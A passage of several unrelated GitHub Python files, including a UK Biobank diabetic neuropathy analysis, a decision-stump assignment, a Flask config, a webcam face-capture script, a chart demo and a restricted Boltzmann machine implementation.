ttest(self,df,var,depvar='polyneuropathy'):\n \n df1=df.loc[pd.notnull(df[var]),[var,depvar]]\n ttest_vals=stats.ttest_ind(df1[(df1[depvar]==1)][var],df1[(df1[depvar]==0)][var])\n\n return ttest_vals\n\n def runplots_static(self,df,depvar='poly_chronic',\n fig_name='diabetes_inflamm_polychronicpain',perc=True,compvars=None,agenormvars=[],savefig=True,pltshow=True,\n splitvar='sex_f31_0_0',labels=dict({1:'Female',0:'Male'}),\n normvars=['age_when_attended_assessment_centre_f21003_0_0','sex_f31_0_0']):\n\n df=df.copy()\n if compvars==None:\n\n if perc:\n compvars=self.compvars+self.compvars_perc\n else:\n compvars=self.compvars\n\n for a in agenormvars:\n df=an.varnorm(df,a)\n\n\n \n\n k=len(compvars)\n fig = plt.figure(figsize=(25, 10*k))\n grid = plt.GridSpec(k, 2, hspace=0.45, wspace=0.3)\n\n splitvars=list(set(list(df.loc[pd.notnull(df[splitvar]),splitvar].unique())))\n\n compvars_use=[]\n pvals=[]\n genders=[]\n vals_case=[]\n vals_std_case=[]\n vals_ctrl=[]\n vals_std_ctrl=[]\n\n for j,v in enumerate(compvars):\n for i,x in enumerate(splitvars):\n\n if pltshow:\n ax=fig.add_subplot(grid[j, i])\n\n df_diab2_use=df.loc[df[splitvar]==x,]\n\n \n\n if v in self.varmap:\n title=str(self.varmap[v])\n else:\n title=str(ml.mapvar(v))\n\n\n \n\n pval=str(round(list(self.ttest(df_diab2_use,v,depvar))[1],7))\n rangevars=df_diab2_use[v].quantile(0.75)-df_diab2_use[v].quantile(0.25)\n\n if 
pltshow:\n ax=sns.boxplot(x=df_diab2_use[depvar],y=df_diab2_use[v],showfliers = False,color='skyblue')\n plt.xticks(fontsize='35')\n plt.yticks(fontsize='35')\n plt.title((title), fontsize='35')\n plt.text(0,rangevars,'p value '+pval,fontsize=24)\n plt.title(labels[x]+'s: '+str(ml.mapvar(v)), fontsize='35')\n\n mask=(df_diab2_use[depvar]==1)\n mean_val_case=df_diab2_use.loc[mask,v].mean()\n std_case=df_diab2_use.loc[mask,v].std()\n std_case=str(round(mean_val_case,2))+' +/- '+str(round(std_case,2))\n mean_val_ctrl=df_diab2_use.loc[~mask,v].mean()\n std_ctrl=df_diab2_use.loc[~mask,v].std()\n std_ctrl=str(round(mean_val_ctrl,2))+' +/- '+str(round(std_ctrl,2))\n\n\n\n compvars_use.append(v)\n genders.append(i)\n pvals.append(pval)\n vals_case.append(mean_val_case)\n vals_ctrl.append(mean_val_ctrl)\n\n vals_std_case.append(std_case)\n vals_std_ctrl.append(std_ctrl)\n\n\n genders=['Male' if c==0 else 'Female' for c in genders]\n compvars_use=[self.varmap[c] if c in self.varmap else ml.mapvar(c) for c in compvars_use]\n\n\n df_out=pd.DataFrame({'Variable':compvars_use,splitvar:genders,'case value':vals_case,'case_vals_std':vals_std_case,\n 'control value':vals_ctrl,'ctrl_vals_std':vals_std_ctrl,'p-value':pvals})\n\n try:\n df_out=df_out.pivot(index='Variable',columns=splitvar,values=['ctrl_vals_std','case_vals_std','p-value'])\n except:\n pass\n\n if savefig:\n plt.savefig(fig_name+'_'+an.date_run+'.jpg', dpi=300,bbox_inches='tight')\n if pltshow:\n plt.show()\n \n return df_out\n\n def pain_base(self,field='troubled_by_pain_or_discomfort_present_for_more_than_3_months_f120019_0_0'):\n df=pd.read_parquet('../../data/df_pain_ukb.parquet')\n mask=(df[field]==1)\n pain1_eids=list(df.loc[mask,'eid'])\n\n return pain1_eids\n\n def basic_diab_df(self):\n icd10_diabs=self.search_icd(strings='diabetes',non_strings='family|screening|insipidus|pregnancy',string_pat=True)[0]\n df_diab=dp.data_merge_dis(remwords='xxxxx',disease='diabetes',icd10s=icd10_diabs,outfile=None,use_icd10=True,\n strcont=True,bef=True,years=0)\n df_diab=df_diab.loc[df_diab['diabetes']==1,]\n\n df_diab.drop(columns=['time_since_diabetes','diabetes'],inplace=True)\n df_diab['NLR']=df_diab['neutrophill_count_f30140_0_0']/df_diab['lymphocyte_count_f30120_0_0']\n\n return df_diab\n\n def basic_df_poly(self,bef=True,years=0,var_time='time_since_diab_poly'):\n\n icd10_diab_poly=self.search_icd(strings='diabetic polyneuropathy',\n non_strings='family|screening|insipidus|pregnancy',string_pat=True)[0]\n\n df_diab_poly=dp.data_merge_dis(remwords='xxxxx',disease='diab_poly',icd10s=icd10_diab_poly,outfile=None,use_icd10=True,\n strcont=True,bef=bef,years=years)[['eid','diab_poly',var_time]]\n\n return df_diab_poly\n\n\n def diabetes_run(self,pain_field='troubled_by_pain_or_discomfort_present_for_more_than_3_months_f120019_0_0'):\n\n #preprocesses diabetes datasets to show polyneuropathy and polyneuropathy with pain at baseline\n\n df_diab=self.basic_diab_df( )\n #diabetic polyneuropathy baseline\n icd10_diab_poly=self.search_icd(strings='diabetic polyneuropathy',\n non_strings='family|screening|insipidus|pregnancy',string_pat=True)[0]\n\n df_diab_poly=dp.data_merge_dis(remwords='xxxxx',disease='diab_poly',icd10s=icd10_diab_poly,outfile=None,use_icd10=True,\n strcont=True,bef=True,years=0)[['eid','diab_poly','time_since_diab_poly']]\n\n df_diab_poly_pros=dp.data_merge_dis(remwords='xxxxx',disease='diab_poly',icd10s=icd10_diab_poly,outfile=None,use_icd10=True,\n strcont=True,bef=False,years=0)[['eid','diab_poly','time_to_diab_poly']]\n\n 
print('recs prosp diab poly',df_diab_poly_pros.loc[df_diab_poly_pros['diab_poly']==1,].shape[0])\n\n\n eids_diab_poly_base=list(df_diab_poly.loc[df_diab_poly['diab_poly']==1,'eid'].astype(str))\n\n print('num diab poly',len(eids_diab_poly_base))\n\n df_diab['polyneuropathy']=0\n df_diab.loc[df_diab['eid'].isin(eids_diab_poly_base),'polyneuropathy']=1\n\n df_diab_poly_base=df_diab.loc[df_diab['eid'].isin(eids_diab_poly_base),]\n\n\n pain1_eids=self.pain_base(field=pain_field)\n\n mask=df_diab_poly_base['eid'].isin(pain1_eids)\n df_diab_poly_base['poly_pain']=0\n df_diab_poly_base.loc[mask,'poly_pain']=1\n\n return df_diab_poly_base,df_diab\n\n def return_eids(self,df,string='polyneuropathy',icd10s=False,\n string_exc='family|screening|insipidus|pregnancy',years=2):\n \n\n\n df['dis_name_all']=df['disease_name_new']+' '+df['disease_name']\n\n\n if icd10s:\n mask_dis=(df['disease'].str.contains(string,regex=True))\n else:\n mask_dis=(df['dis_name_all'].str.contains(string,regex=True))&(~df['dis_name_all'].str.contains(string_exc,regex=True))\n\n\n\n df['dis']=0\n df.loc[mask_dis,'dis']=1\n\n\n df_cases=df.loc[mask_dis,]\n mask_exc=~(df['eid'].isin(df_cases['eid']))\n df_ctrls=df.loc[mask_exc,]\n\n \n cases=pd.DataFrame(df_cases.groupby(['eid']).agg({'disease_date':'min','date_assess':'min'})).reset_index()\n ctrls=pd.DataFrame(df_ctrls.groupby(['eid']).agg({'disease_date':'min','date_assess':'min','death':'max'})).reset_index()\n\n cases['eid']=cases['eid'].astype(str)\n ctrls['eid']=ctrls['eid'].astype(str)\n\n mask_inc_snap=(cases['disease_date']<=cases['date_assess'])\n mask_inc_pro=(cases['disease_date']>=cases['date_assess']+ DateOffset(years=years))\n\n cases_inc_pro=list(cases.loc[mask_inc_pro,'eid'].astype(str).unique())\n cases_inc_snap=list(cases.loc[mask_inc_snap,'eid'].astype(str).unique())\n\n cases_exc_pro=list(cases.loc[~mask_inc_pro,'eid'].astype(str).unique())\n cases_exc_snap=list(cases.loc[~mask_inc_snap,'eid'].astype(str).unique())\n \n mask_death=(ctrls['death']==1)\n ctrls_exc_pro=list(ctrls.loc[mask_death,'eid'].astype(str).unique())\n \n #eids to exclude\n eids_exc_snap=cases_exc_snap\n eids_exc_pro=cases_exc_pro+ctrls_exc_pro\n \n disease_list=pd.DataFrame(df.loc[mask_dis,'dis_name_all'].value_counts())\n df_dict=dict({'eids_inc_snap':cases_inc_snap,'eids_inc_pro':cases_inc_pro,'eids_exc_snap':eids_exc_snap,\n 'eids_exc_pro':eids_exc_pro,'disease_list':disease_list,'cases':cases,'ctrl_deaths':ctrls_exc_pro})\n \n \n return df_dict\n\n\n def shapruns(self,run,df,remwords='diabetes|H360|total_dis',depvar='polyneuropathy',resizeratio=5,resize=1,perc=False,\n compvars=None,stream=False,runs=2,holdout_ratio=0.2):\n \n shap_obj=self.process_run(df=df,depvar=depvar,resize=resize,resizeratio=resizeratio,remwords=remwords,runs=runs,\n holdout_ratio=holdout_ratio)\n feats_all=ml.shapgraphs_tuple(shap_obj,max_disp=30,figname='SHAP IDEARS '+run+self.date_suff,stream=stream)\n ml.ROCAUC_tuples(df_out_list=[shap_obj[2]],labels=['IDEARS - all'],cols=['blue'],figname='ROCAUC '+run+self.date_suff,stream=stream)\n self.runplots_static(df=df,depvar=depvar,fig_name='Inflamm boxplots '+run+self.date_suff,perc=perc,compvars=compvars)\n\n return feats_all,shap_obj\n\n def shapruns_new(self,run,df,remwords='diabetes|H360|total_dis',depvar='polyneuropathy',resizeratio=5,resize=1,perc=False,\n compvars=None,stream=False,runs=2,barplots=1,holdout_ratio=0.5,df_val_use=None,preprocess=True):\n \n shap_obj=self.process_run(df=df,depvar=depvar,resize=resize,resizeratio=resizeratio,remwords=remwords,runs=runs,\n 
holdout_ratio=holdout_ratio,df_val_use=df_val_use,preprocess=preprocess)\n\n print(len(shap_obj))\n feats_all=ml.shapgraphs_tuple(shap_obj,max_disp=30,figname='SHAP IDEARS '+run+self.date_suff,stream=stream)\n aucs=ml.ROCAUC_tuples(df_out_list=[shap_obj[2]],labels=['IDEARS - all'],cols=['blue'],figname='ROCAUC '+run+self.date_suff,stream=stream)\n\n rets=dict({'feats_all':feats_all,'shaps':shap_obj,'aucs':aucs})\n if barplots==1:\n data_sum=self.runplots_static(df=df,depvar=depvar,fig_name='Inflamm boxplots '+run+self.date_suff,perc=perc,compvars=compvars)\n rets['data_sum']=data_sum\n return rets\n\n\n\n\n\n\n\n","repo_name":"binfnstats/idears_orig","sub_path":"logic/data_processing/data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":21165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8047669138","text":"import csv\nimport sys\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import arange, array, ones, linalg, zeros\nfrom collections import Counter\n\ndef hS(mtrx):\n if(mtrx.size != 0 ):\n pos = np.count_nonzero( mtrx[ :, -1] == 1)\n neg = np.count_nonzero( mtrx[ :, -1] == -1)\n if(pos == 0 or neg == 0):\n return 0\n h = (-pos/(pos+neg)) * (math.log( pos/(pos+neg), 2))-(neg/(pos+neg))*(math.log(neg/(pos+neg),2))\n return h\n return 0\n\n\ndef pH(mtrx, parentSize):\n if(mtrx.size != 0 ):\n pos = np.count_nonzero( mtrx[ :, -1] == 1)\n neg = np.count_nonzero( mtrx[ :, -1] == -1)\n if(pos == 0 or neg == 0):\n return 0\n h = (-pos/(pos+neg)) * (math.log( pos/(pos+neg), 2))-(neg/(pos+neg))*(math.log(neg/(pos+neg),2))\n p = (pos+neg)/parentSize\n return (h*p)\n return 0\n\n\ndef iGain(mtrx, feature):\n sortCol = mtrx[mtrx[:,feature].argsort()][:,feature]\n h = hS(mtrx)\n\n bestGain = 0\n bestThres = 0\n\n for i in range(len(sortCol)):\n s1, s2 = [], []\n for j in range(len(mtrx)):\n if(mtrx[j][feature] >= sortCol[i]): # True\n s1.append(mtrx[j])\n else: # False\n s2.append(mtrx[j])\n pH1 = pH(np.array(s1), len(mtrx) )\n pH2 = pH(np.array(s2), len(mtrx) )\n\n iG = h - ( pH1 + pH2 )\n if iG > bestGain:\n bestThres = sortCol[i]\n bestGain = iG\n\n return bestGain, bestThres\n\n\ndef testE(mtrxTEST, feat, thres, ltLBL, rtLBL):\n s1, s2 = [], []\n\n for j in range(len(mtrxTEST)):\n if(mtrxTEST[j][feat] >= thres): # True\n s1.append(mtrxTEST[j])\n\n else: # False\n s2.append(mtrxTEST[j])\n\n pos1 = np.count_nonzero( np.array(s1)[:, -1] == ltLBL)\n pos2 = np.count_nonzero( np.array(s2)[:, -1] == rtLBL)\n\n print( \"Testing Error %: \", (1 - ((pos1+pos2)/284))*100 )\n\n\ndef trainE(mtrx, feat, thres):\n s1, s2 = [], []\n\n for j in range(len(mtrx)):\n if(mtrx[j][feat] >= thres): # True\n s1.append(mtrx[j])\n\n else: # False\n s2.append(mtrx[j])\n\n maj1 = Counter(np.array(s1)[:, -1]).most_common(1)[0][0]\n maj2 = Counter(np.array(s2)[:, -1]).most_common(1)[0][0]\n\n pos1 = np.count_nonzero( np.array(s1)[:, -1] == maj1)\n pos2 = np.count_nonzero( np.array(s2)[:, -1] == maj2)\n\n tE = (1 - ((pos1+pos2)/284))*100\n\n return maj1, maj2, tE\n\n\ndef dTree(xTrain):\n gain = 0\n thres = 0\n feat = None\n\n for j in range(len(xTrain[0,:]) - 1):\n g, t = iGain(xTrain, j)\n if(g > gain):\n gain = g\n thres = t\n feat = j\n lt, rt, tE = trainE(xTrain, feat, thres)\n\n return feat, thres, lt, rt, tE, gain\n\n########################## MAIN ###############################\nif(len(sys.argv) < 3):\n print(\"Must include filenames as arguments\")\nelse:\n # trainDATA\n X = []\n f = open(sys.argv[1], 
'r')\n f = csv.reader(f)\n for row in f:\n X.append(row[1:31]+row[0:1])\n Train = array(X).astype(np.float64)\n\n # testDATA\n X = []\n f = open(sys.argv[2], 'r')\n f = csv.reader(f)\n for row in f:\n X.append(row[1:31] + row[0:1])\n Test = array(X).astype(np.float64)\n ########################## TEST ###############################\n feat, thres, lt, rt, trainE, grain = dTree(Train)\n\n print(\"Decision Stump: \")\n print(\"Feature \", feat, \" split\")\n print(\"| Label \", lt, \" < \", thres)\n print(\"| Label \", rt, \" >= \", thres)\n\n print(\"\\n\\nSplitting on feature \", feat)\n print(\"With threshold value \", thres)\n print(\"Best information gain value \", grain)\n\n print(\"\\n\\nTraining Error %: \", trainE)\n testE(Test, feat, thres, lt, rt)\n","repo_name":"sanderau/CS434-ImplementationAssignmentOne","sub_path":"src/Hw2/q2_1.py","file_name":"q2_1.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40059043096","text":"import os\n# from dotenv import load_dotenv\n\n\nclass Config(object):\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n JWT_SECRET_KEY = \"duck\"\n SECRET_KEY = \"learning flask login\"\n \n\n #1mb for file size uploads\n MAX_CONTENT_LENGTH = 1 * 1024 * 1024\n\n\n @property\n def SQLALCHEMY_DATABASE_URI(self):\n value = os.environ.get(\"DB_URI\")\n\n if not value:\n raise ValueError(\"DB_URI is not set\")\n\n return value\n \n @property\n def AWS_ACCESS_KEY_ID(self):\n value = os.environ.get(\"AWS_ACCESS_KEY_ID\")\n\n if not value:\n raise ValueError(\"AWS_ACCESS_KEY_ID is not set\")\n\n return value\n \n @property\n def AWS_SECRET_ACCESS_KEY(self):\n value = os.environ.get(\"AWS_SECRET_ACCESS_KEY\")\n\n if not value:\n raise ValueError(\"AWS_SECRET_ACCESS_KEY is not set\")\n\n return value\n \n @property\n def AWS_S3_BUCKET(self):\n value = os.environ.get(\"AWS_S3_BUCKET\")\n\n if not value:\n raise ValueError(\"AWS_S3_BUCKET is not set\")\n\n return value\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n\nclass ProductionConfig(Config):\n @property\n def JWT_SECRET_KEY(self):\n value = os.environ.get(\"JWT_SECRET_KEY\")\n\n if not value:\n raise ValueError(\"JWT Secret Key is not set\")\n \n return value\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = \"sqlite:///:memory:\"\n\nclass WorkflowConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = \"sqlite:///:memory:\"\n\nenvironment = os.environ.get(\"FLASK_ENV\")\n\nif environment == \"production\":\n app_config = ProductionConfig()\nelif environment == \"testing\":\n app_config = TestingConfig()\nelse:\n app_config = DevelopmentConfig()","repo_name":"Ctrain68/contract_marketplace","sub_path":"src/default_settings.py","file_name":"default_settings.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"13323073800","text":"import cv2\nimport dlib\nimport os\nimport random\n\noutput_dir = './face_photos/my_faces'\nsize = 64\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ndef relight(img, light=1, bias=0):\n w = img.shape[1]\n h = img.shape[0]\n\n for i in range(0, w):\n for j in range(0, h):\n for l in range(3):\n tmp = int(img[j, i, l]*light + bias)\n if tmp > 255:\n tmp = 255\n elif tmp < 0:\n tmp = 0\n img[j, i, l] = tmp\n return img\n\n\ndetector = dlib.get_frontal_face_detector()\ncamera = cv2.VideoCapture(0)\n\nindex = 1\nwhile True:\n if index <= 
10000:\n print('Being processed picture %s' % index)\n success, img = camera.read()\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n dets = detector(gray_img, 1)\n\n for i, d in enumerate(dets):\n x1 = d.top() if d.top() > 0 else 0\n y1 = d.bottom() if d.bottom() > 0 else 0\n x2 = d.left() if d.left() > 0 else 0\n y2 = d.right() if d.right() > 0 else 0\n\n face = img[x1:y1, x2:y2]\n face = relight(face, random.uniform(0.5, 1.5), random.randint(-50, 50))\n\n face = cv2.resize(face, (size, size))\n\n cv2.imshow('image', face)\n\n cv2.imwrite(output_dir+'/'+str(index)+'.jpg', face)\n\n index += 1\n key = cv2.waitKey(30) & 0xff\n if key == 27:\n break\n else:\n print('Finished!')\n break\n","repo_name":"weichen283/FaceRecognition-pytorch","sub_path":"selfie.py","file_name":"selfie.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"12599590301","text":"from array import *\r\nimport matplotlib.pyplot as plt\r\nx_pos = 0\r\ny_pos = 0\r\nmag = 0.1\r\narr_x = array('f', [])\r\narr_y = array('f', [])\r\n\r\n\r\ndef velocity_vector(way_x, way_y):\r\n x = x_pos\r\n y = y_pos\r\n distance = (((x_pos - way_x) ** 2 + (y_pos - way_y) ** 2) ** 0.5)\r\n vector_x = (((way_x - x_pos) / distance) * 0.1)\r\n vector_y = (((way_y - y_pos) / distance) * 0.1)\r\n while (vector_x < way_x) and (vector_y < way_y):\r\n x = x + vector_x\r\n y = y + vector_y\r\n\r\n if x >= way_x and y >= way_y:\r\n print(str(way_x) + \"i + \" + str(way_y) + \"j\")\r\n break\r\n else:\r\n print(str(x) + \"i + \" + str(y) + \"j\")\r\n arr_x.append(x)\r\n arr_y.append(y)\r\n\r\n\r\nfor j in range(0, 5):\r\n waypoint = input()\r\n msg = waypoint.split()\r\n way_x = float(msg[0])\r\n way_y = float(msg[1])\r\n velocity_vector(way_x, way_y)\r\n arr_x.append(way_x)\r\n arr_y.append(way_y)\r\n x_pos = arr_x[-1]\r\n y_pos = arr_y[-1]\r\nplt.plot(arr_x, arr_y, linewidth=2.0)\r\nplt.show()\r\n","repo_name":"Bhargavi2211/ros2","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70267245309","text":"\nimport epyk as pk\n\n\npage = pk.Page()\npage.headers.dev() # Change the Epyk logo\n\ndataPoints = [\n {'x': 0, 'y': 10, 'y1': 10},\n {'x': 1, 'y': 35, 'y1': 20},\n {'x': 2, 'y': 25, 'y1': 10},\n {'x': 3, 'y': 30, 'y1': 5},\n {'x': 4, 'y': 28, 'y1': 10}]\n\ndataPoints2 = [\n {'label': \"mango\", 'x': 0, 'y': 30, 'y1': 10},\n {'label': \"grape\", 'x': 1, 'y': 28, 'y1': 5}\n]\n\npage.ui.input(\"Test\")\n\n#js_data_object = page.data.js.record(data=dataPoints2)\n\nc = page.ui.charts.c3.line(dataPoints2, y_columns=[\"y\", 'y1'], x_axis='x') #dataPoints, y_columns=[\"y\", 'y1'], x_axis='x')\n\n\n#\n# page.ui.button(\"reset\").click([\n# c.build(dataPoints2),\n# #c.js.render(),\n# ])\n# #\n# c.click([\n# page.js.console.log(c.js.content),\n# ])\n#\n# dataPoints3 = [\n# {'label': \"mango\", 'x': 0, 'y': 20, 'y1': 20, 'r': 10},\n# {'label': \"grape\", 'x': 1, 'y': 18, 'y2': 20, 'r': 5}\n# ]\n#\n# page.ui.button(\"add\").click([\n# c.js.load(['test', 1, 15, 26, 89]),\n# #c.js.render(),\n# ])\n#\n# page.ui.button(\"remove\").click([\n# c.js.unload(['test']),\n# #c.js.render(),\n# ])\n#\n#\n# page.ui.button(\"reset\").click([\n# c.build(dataPoints3),\n# #c.js.render(),\n# 
])\n\n","repo_name":"epykure/epyk-templates","sub_path":"locals/charts/c3_single.py","file_name":"c3_single.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"72966586427","text":"from tqdm import tqdm\n\nfrom demo.lab4.util import *\nfrom utils.util import ensure_dir, plot_metric\n\nplt.style.use('seaborn-white')\n\n\nclass RestrictedBoltzmannMachine():\n '''\n For more details : A Practical Guide to Training Restricted Boltzmann Machines https://www.cs.toronto.edu/~hinton/absps/guideTR.pdf\n '''\n\n def __init__(self, ndim_visible, ndim_hidden, is_bottom=False, image_size=(28, 28), is_top=False, n_labels=10,\n batch_size=10, visuals_save_path=\"\", weight_decay=0.0001, learning_rate=0.01, momentum=0.7):\n\n \"\"\"\n Args:\n ndim_visible: Number of units in visible layer.\n ndim_hidden: Number of units in hidden layer.\n is_bottom: True only if this rbm is at the bottom of the stack in a deep belief net. Used to interpret visible layer as image data with dimensions \"image_size\".\n image_size: Image dimension for visible layer.\n is_top: True only if this rbm is at the top of stack in deep beleif net. Used to interpret visible layer as concatenated with \"n_label\" unit of label data at the end. \n n_label: Number of label categories.\n batch_size: Size of mini-batch.\n visuals_save_path: the folder where the debug images should be saved\n \"\"\"\n\n self.ndim_visible = ndim_visible\n\n self.ndim_hidden = ndim_hidden\n\n self.is_bottom = is_bottom\n\n if is_bottom: self.image_size = image_size\n\n self.is_top = is_top\n\n if is_top: self.n_labels = n_labels\n\n self.batch_size = batch_size\n\n self.delta_bias_v = 0\n\n self.delta_weight_vh = 0\n\n self.delta_bias_h = 0\n\n self.bias_v = np.random.normal(loc=0.0, scale=0.01, size=(self.ndim_visible))\n\n self.weight_vh = np.random.normal(loc=0.0, scale=0.01, size=(self.ndim_visible, self.ndim_hidden))\n\n self.bias_h = np.random.normal(loc=0.0, scale=0.01, size=(self.ndim_hidden))\n\n self.delta_weight_v_to_h = 0\n\n self.delta_weight_h_to_v = 0\n\n self.weight_v_to_h = None\n\n self.weight_h_to_v = None\n\n self.learning_rate = learning_rate\n\n self.momentum = momentum\n\n self.weight_decay = weight_decay\n\n self.print_period = 5000\n\n ensure_dir(visuals_save_path)\n self.rf = { # receptive-fields. 
Only applicable when visible layer is input data\n \"period\": 5000, # iteration period to visualize\n \"grid\": [5, 5], # size of the grid\n \"ids\": np.random.randint(0, self.ndim_hidden, 25), # pick some random hidden units\n \"path\": visuals_save_path\n }\n\n return\n\n def viz_all_rf(self, name=\"rf\"):\n \"\"\"\n Visualize all receptive fields and save\n \"\"\"\n weights = self.weight_vh.reshape((self.image_size[0], self.image_size[1], -1))\n imax = abs(weights).max()\n for hw in range(weights.shape[2]):\n fig, axs = plt.subplots()\n plt.title(f\"RF {hw}\")\n axs.set_xticks([])\n axs.set_yticks([])\n axs.imshow(weights[:, :, hw], cmap=\"bwr\", vmin=-imax, vmax=imax, interpolation=None)\n plt.savefig(os.path.join(self.rf[\"path\"], f\"{name}_{hw:04d}.png\"), dpi=200)\n plt.close('all')\n\n def viz_weights_histogram(self, name):\n fig, axs = plt.subplots(1, 3, figsize=(6.4 * 3, 4.8))\n fig.suptitle(f'Histogram plot of weights and biases, {name}')\n\n for ax in axs.flat:\n ax.set(xlabel='weight value', ylabel='count')\n\n kwargs = dict(histtype='stepfilled', alpha=0.3, density=True, bins=100)\n\n axs[0].set_title('weights vh')\n axs[0].hist(self.weight_vh.flatten(), label='weights', **kwargs)\n\n axs[1].set_title('bias v')\n axs[1].hist(self.bias_v.flatten(), **kwargs)\n\n axs[2].set_title('bias h')\n axs[2].hist(self.bias_h.flatten(), **kwargs)\n\n plt.savefig(os.path.join(self.rf[\"path\"], f\"weights_histogram_{name}.png\"), dpi=200)\n plt.close()\n\n def cd1(self, visible_trainset, n_iterations=10000):\n\n \"\"\"Contrastive Divergence with k=1 full alternating Gibbs sampling\n\n Args:\n visible_trainset: training data for this rbm, shape is (size of training set, size of visible layer)\n n_iterations: number of iterations of learning (each iteration learns a mini-batch)\n \"\"\"\n\n print(f\"learning CD1. 
visuals_save_path={self.rf['path']}\")\n\n logs = {}\n logs[\"recon_losses\"] = []\n logs[\"sum_of_weights_changes\"] = [[], [], [], \"w_vh, b_v, b_h\"]\n for it in tqdm(range(n_iterations)):\n mini_idx = it % (visible_trainset.shape[0] // self.batch_size)\n if mini_idx == 0:\n shuffle_indices = np.arange(visible_trainset.shape[0])\n np.random.shuffle(shuffle_indices)\n visible_trainset = visible_trainset[shuffle_indices]\n\n # mini_indices = np.random.choice(visible_trainset.shape[0], self.batch_size, replace=False)\n # pv_0 = v0 = visible_trainset[mini_indices]\n pv_0 = v0 = visible_trainset[self.batch_size * mini_idx:self.batch_size * (mini_idx + 1)]\n ph_0, h0 = self.get_h_given_v(v0)\n p_v1, _ = self.get_v_given_h(h0)\n p_h1, _ = self.get_h_given_v(p_v1)\n\n self.update_params(pv_0, ph_0, p_v1, p_h1)\n\n # visualize once in a while when visible layer is input images\n\n if it % self.rf[\"period\"] == 0 and self.is_bottom:\n viz_rf(weights=self.weight_vh[:, self.rf[\"ids\"]].reshape((self.image_size[0], self.image_size[1], -1)),\n it=it, grid=self.rf[\"grid\"], save_path=self.rf[\"path\"])\n\n # print progress\n\n if it % self.print_period == 0:\n _, hr = self.get_h_given_v(visible_trainset) # reconstruction loss\n _, vr = self.get_v_given_h(hr)\n recon_loss = np.linalg.norm(visible_trainset - vr) / visible_trainset.shape[0]\n\n logs[\"recon_losses\"].append(recon_loss)\n logs[\"sum_of_weights_changes\"][0].append(np.abs(self.delta_weight_vh).sum())\n logs[\"sum_of_weights_changes\"][1].append(np.abs(self.delta_bias_v).sum())\n logs[\"sum_of_weights_changes\"][2].append(np.abs(self.delta_bias_h).sum())\n print(logs)\n print(\"iteration=%7d recon_loss=%4.10f\" % (it, recon_loss))\n\n self.viz_weights_histogram(f\"{it:06d}\")\n\n with open(os.path.join(self.rf[\"path\"], f\"logs.txt\"), \"w\") as f:\n f.write(f\"{logs}\")\n plot_metric(logs[\"recon_losses\"], os.path.join(self.rf[\"path\"], f\"recon_loss\"), True)\n\n return logs\n\n def update_params(self, v_0, h_0, v_k, h_k):\n\n \"\"\"Update the weight and bias parameters.\n\n You could also add weight decay and momentum for weight updates.\n\n Args:\n v_0: activities or probabilities of visible layer (data to the rbm)\n h_0: activities or probabilities of hidden layer\n v_k: activities or probabilities of visible layer\n h_k: activities or probabilities of hidden layer\n all args have shape (size of mini-batch, size of respective layer)\n \"\"\"\n\n self.delta_bias_v = self.momentum * self.delta_bias_v + self.learning_rate * np.average(v_0 - v_k, axis=0)\n self.delta_weight_vh = self.learning_rate * ((v_0.T @ h_0 - v_k.T @ h_k) / v_0.shape[\n 0] - self.weight_decay * self.weight_vh) + self.momentum * self.delta_weight_vh\n # self.learning_rate * (np.average(v_0[:, :, np.newaxis] * h_0[:, np.newaxis, :], axis=0)\n # - np.average(v_k[:, :, np.newaxis] * h_k[:, np.newaxis, :], axis=0))\n self.delta_bias_h = self.momentum * self.delta_bias_h + self.learning_rate * np.average(h_0 - h_k, axis=0)\n\n self.bias_v += self.delta_bias_v\n self.weight_vh += self.delta_weight_vh\n self.bias_h += self.delta_bias_h\n\n return\n\n def get_h_given_v(self, visible_minibatch):\n\n \"\"\"Compute probabilities p(h|v) and activations h ~ p(h|v) \n\n Uses undirected weight \"weight_vh\" and bias \"bias_h\"\n \n Args: \n visible_minibatch: shape is (size of mini-batch, size of visible layer)\n Returns: \n tuple ( p(h|v) , h) \n both are shaped (size of mini-batch, size of hidden layer)\n \"\"\"\n return self._get_h_given_v(visible_minibatch, 
self.weight_vh)\n\n def get_v_given_h(self, hidden_minibatch):\n\n \"\"\"Compute probabilities p(v|h) and activations v ~ p(v|h)\n\n Uses undirected weight \"weight_vh\" and bias \"bias_v\"\n\n Args:\n hidden_minibatch: shape is (size of mini-batch, size of hidden layer)\n Returns:\n tuple ( p(v|h) , v)\n both are shaped (size of mini-batch, size of visible layer)\n \"\"\"\n return self._get_v_given_h(hidden_minibatch, self.weight_vh.T)\n\n def _get_h_given_v(self, visible_minibatch, weights):\n assert weights is not None\n\n total_input_for_each_unit = (visible_minibatch @ weights) + self.bias_h\n p_h_given_v = sigmoid(total_input_for_each_unit)\n h_sample = sample_binary(p_h_given_v)\n\n return p_h_given_v, h_sample\n\n def _get_v_given_h(self, hidden_minibatch, weights):\n assert weights is not None\n\n total_input_for_each_unit = (hidden_minibatch @ weights) + self.bias_v\n if self.is_top:\n\n \"\"\"\n Here visible layer has both data and labels. Compute total input for each unit (identical for both cases), \\ \n and split into two parts, something like support[:, :-self.n_labels] and support[:, -self.n_labels:]. \\\n Then, for both parts, use the appropriate activation function to get probabilities and a sampling method \\\n to get activities. The probabilities as well as activities can then be concatenated back into a normal visible layer.\n \"\"\"\n\n left_in, 